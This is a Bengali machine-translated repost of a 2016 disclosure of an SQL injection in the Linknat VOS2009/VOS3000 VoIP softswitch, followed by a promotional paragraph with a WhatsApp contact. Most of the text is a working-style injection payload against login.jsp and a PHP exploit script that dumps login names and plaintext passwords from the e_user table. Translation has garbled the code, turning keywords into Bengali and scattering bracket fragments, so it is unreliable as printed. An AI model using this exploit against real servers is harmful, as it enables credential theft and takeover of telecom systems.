Linknat VOS2009/VOS3000 SQL ইনজেকশন
থেকে: ওসামা খালিদ <osama ()="" codinghazard="" com="
">তারিখ: 19 মে, 2016 16:52:54 +0500</osama>
একটি এসকিউএল ইনজেকশন লিঙ্কনাট VOS3000/VOS2009, একটি জনপ্রিয় ভিওআইপি পাওয়া গেছে সফটসুইচ, যা দূরবর্তী আক্রমণকারীদের অ্যাক্সেস পেতে অনুমতি দিতে পারে সরল-পাঠে সংরক্ষিত প্রমাণপত্রাদি। আবেদন: লিঙ্কনাট VOS3000/VOS2009 সংস্করণ প্রভাবিত: 2.1.1.5, 2.1.1.8, 2.1.2.0 বিক্রেতার ইউআরএল: http://www.linknat.com/ বাগ: SQLi (DBA সুবিধা সহ) ধরন: দূরবর্তী রেজোলিউশন: ফিক্সড, আপগ্রেড 2.1.2.4 অথবা 2.1.6.0 পরিষ্কার সংস্করণ রেফারেন্স: WooYun-2015-145458 - http://www.wooyun.org/bugs/wooyun-2010-0145458 এসকিউলি রিপোর্ট করেছে যে সময় ভিত্তিক অন্ধ। যেহেতু এটি একটি ইন-ব্যান্ড SQLI নয়, ফলাফল স্বাগতম আউটপুট থেকে সংগ্রহ করা যেতে পারে.jsp একই সময়ে সুসংবদ্ধ। (১ম অনুরোধ) পোস্ট http://target/eng/login.jsp PARAM লগইনটাইপ=1 name=' ইউনিয়ন নির্বাচন 1,2,@@version,'হ্যালো', 5,6# পাস=' অথবা '=' (একই অধিবেশনে ২য় অনুরোধ) http://target/eng/welcome.jsp ফলাফল 0|' ইউনিয়ন নির্বাচন 1,2,@@version,'হ্যালো', 5,6#|1|5.0.51a-সম্প্রদায়|হ্যালো|0.00|0.00| <?php # # Linknat VOS2[ EXPLOIT CODE ]009/VOS3000 SQLi exploit # # DISCLAIMER: The exploit is to be used for educational purposes only # The author would not be responsible for any misuse # # AUTHOR: Osama Khalid # WEBSITE: http://www.codinghazard.com/ # DATE: 19/05/2016 # REF: http://www.wooyun.org/bugs/wooyun-2010-0145458 if ($argc < 2) { banner(); usage(); exit; } $host = $argv; $column_one = isset($argv) ? [1]$argv : "loginname"; $column_[2]two = i[2]sset($argv) ? $argv : "password"; $table [3] = isse[3]t($argv) ? $argv : "e_user"; $other [4]= isset($[4]argv) ? $argv : ""; function banner() { [5] echo [5]"########################################n"; echo "# #n"; echo "# Linknat VOS3000/VOS2009 SQLi exploit #n"; echo "# #n"; echo "# Osama Khalid #n"; echo "########### codinghazard.com ###########n"; } function usage() { echo "n"; echo "php vos3000.php n"; echo "php vos3000.php 127.0.0.1n"; [HOST] echo "php vos3000.php n"; echo "php vos3000.php 127.0.0.1 tab[HOST]l[COL1]e[COL2]_[TABLE]s[OTHER SQL]chema table_name information_schema.tables "where table_schema = 'mysql'" n"; } function curl($url, $post = array(), $cookies = null, $header = false) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false); curl_setopt($curl, CURLOPT_HEADER, $header); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); if ($cookies != null) curl_setopt($curl, CURLOPT_COOKIE, $cookies); if (count($post) > 0) { প্রতিটি ($key => $value হিসাবে $post $post আইটেম = $key। '=' . urlencode($value); $post স্ট্রিং = ইম[]্প্রোভাইজ করুন('&', $post_আইটেম); curl_setopt ($curl, CURLOPT_POST, ১); curl_setopt($curl, CURLOPT_POSTFIELDS, $post স্ট্রিং); } $data = curl_exec($curl); curl_close($curl); $data প্রত্যাবর্তন; } ফাংশন কোয়েরি($host, $query) { $data = কার্ল ("http://$host/eng/login.jsp";, অ্যারে "loginType" => 1, "নাম" => "" ইউনিয়ন" । $query । "#", "পাস" => "" অথবা "=" ), শূন্য, সত্য); preg_match_all('|' সেট-কুকি: (.*);|U', $data, $matches); $cookies = বিস্ফোরিত('; ', $matches); $data = কার্ল ("http://$host/eng/welcome.jsp";,[1] অ্যারে(), $cookies, মিথ্যা); $parts = বিস্ফোরণ("|", ছাঁটা($data);; যদি (গণনা($parts) < 7) return false; return array($parts, $parts); } function ascii_table($data) { $keys = [3]array_key[4]s(end($data)); $wid = array_map('strlen', $keys); foreach($data as $row) { foreach(array_values($row) as $k => $v) $wid = সর্বোচ্চ ($wid, স্ট্রলেন($v); } প্রতিটি ($k => $v [$k]হিসাবে $wid)[$k] { $fmt = "%-{$v}s"; $sep = str_repeat('-',', $v);[$k] } $fmt = '| ' . বি[$k]স্ফোরিত(' | ', $fmt)। ' |'; $sep = '+-'। ('-+-', $sep)। '-+'; $buf = অ্যারে ($sep, vsprintf($fmt, $keys), $sep); $row হিসেবে $data) { $buf = vsprintf($fmt, $row); $buf = $sep; } রিটার্ন ই[]ম্প্রোভাইজ ("n", $buf); } ব্যানার();[] "n"; প্রতিধ্বনি "টার্গেট: $hostn"; প্রতিধ্বনি "কলাম #1: $column_একn"; প্রতিধ্বনি "কলাম #2: $column_2n"; প্রতিধ্বনি "টেবিল: $tablen"; প্রতিধ্বনি "অন্যান্য: $othern"; "n"; $results = অ্যারে(); $count_ফলাফল = জিজ্ঞাসা ($host, "নির্বাচন করুন 1,2,Count(*), 4,5,6 থেকে $table $other"); যদি ($count_ফলাফল) { $count = intval ($count_ফলাফল); প্রতিধ্বনি "খুঁজে $count সারি...n"; $i=0[0]; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table $other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" . hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=[0]" . hex2bin($result) . " n";="" }="" else="" {="[1]" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" ==""[]> হেক্স২বিন($result), $column_টু => হেক্[0]স২বিন($result);। } যদি (গণনা([1]$results) > 0) { প্রতিধ্বনি "nn"। ascii_table($results)। "n"; } } অন্যথায় { প্রতিধ্বনি "সারি গণনা পুনরুদ্ধারকরতে ত্রুটি"; } ?></$count;>
2016 থেকে যারা VOS3000 হ্যাক করার জন্য কিছু SQL ইনজেকশন নরম সামগ্রী ব্যবহার করে, আমাদের নিজস্ব নিরাপত্তা ব্যবস্থা আছে, আমরা এখন আমাদের নিরাপত্তা ব্যবস্থা খুব শক্তিশালী, আমার কাজের ফোকাস সবসময় ভিওআইপি সফট-সুইচের জন্য নিরাপত্তার জন্য ছিল। বেশিরভাগ সময় আমি বিনামূল্যে উপদেশ দিতাম অথবা যতটা সম্ভব বিনামূল্যে তথ্য শেয়ার করতাম। এখনো অনেক নোংরা জিনিস ঘুরে বেড়াচ্ছে, তাই দয়া করে সবসময় সাবধান থাকুন এবং আরো জানুন। অন্যথায় আপনি কখনোই ভাল ব্যবসা করতে পারবেন না। আজকাল যারা VOS3000 ক্লায়েন্ট সফটওয়্যারে লুকানো স্ক্রিপ্ট বা ম্যালওয়্যার ব্যবহার করে VOS সার্ভার হ্যাক করে.
আরও সাহায্যের জন্য আমাকে হোয়াটসঅ্যাপে নক করুন: +880191119966 – আমি সব উপায়ে সাহায্য করব।
